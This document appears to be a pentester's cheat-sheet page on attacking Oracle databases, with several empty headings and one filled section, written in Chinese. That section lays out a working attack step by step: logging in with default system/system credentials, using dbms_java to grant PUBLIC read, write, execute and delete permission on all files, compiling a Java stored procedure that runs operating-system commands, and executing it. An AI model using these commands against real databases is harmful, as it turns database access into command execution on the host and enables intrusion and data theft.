Oracle

# GetShell

# Vuln

# Privilege Escalation

###  创建java函数提权

- dba权限

------

1. 使用sqlplus连接

```
system/system@192.168.117.66:1521/orcl
```

1. 赋权

```
begin dbms_java.grant_permission( 'PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'read,write,execute,delete' );end;
/
```

1. 创建java代码

```
create or replace and compile java source named exe_linux as
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.UnknownHostException;
public class Test
{
public static String list_cmd(String str){
    Runtime runtime=Runtime.getRuntime();
  StringBuffer enco = new StringBuffer();
  enco.append("GBK");
  try{
  Process proc =runtime.exec(str);
  InputStream inp_suc=proc.getInputStream();
  InputStream inp_err=proc.getErrorStream();
  BufferedReader bfr_err = new BufferedReader(new InputStreamReader(inp_err,enco.toString()));
  BufferedReader bfr_suc = new BufferedReader(new InputStreamReader(inp_suc,enco.toString()));
    String strLine;
      while( (strLine=(bfr_suc.readLine())) != null){
     
      System.out.println(strLine);
          }
  while( (strLine=(bfr_err.readLine())) != null){
     
    System.out.println(strLine);
    }
        proc.destroy();
        inp_suc.close();
        inp_err.close();
    }catch (Exception e) {
      System.out.println("EXECUTE IS ERROR!");
      System.out.println(e.getMessage());
    }
    return "";
  }
     
  /* public static void main(String[] args){
     
      list_cmd(args[0]);
    }
    **/
}

/
```

1. 创建存储过程

```
create or replace procedure p_exe_linux(str varchar2) as language java
name 'Test.list_cmd(java.lang.String)';
/
```

1. 命令执行

```
SET SERVEROUTPUT ON
exec dbms_java.set_output(1111111111111);
EXEC P_EXE_LINUX('whoami');
```

# Other

用户库中所有字段名带个人信息的表

# References

- https://mp.weixin.qq.com/s/VgXOXVl-Bx2Vi8BYxdx3CA